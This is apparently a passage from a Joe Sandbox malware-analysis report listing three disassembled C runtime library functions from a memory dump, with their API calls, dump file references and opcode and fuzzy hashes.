                                                                                                                        • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                        • __locking.LIBCMT ref: 0040BB95
                                                                                                                        • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3240763771-0
                                                                                                                        • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                        • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                        • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                        • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                        Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                        • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                        • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                        • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                        Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3016257755-0
                                                                                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                        • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                        • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89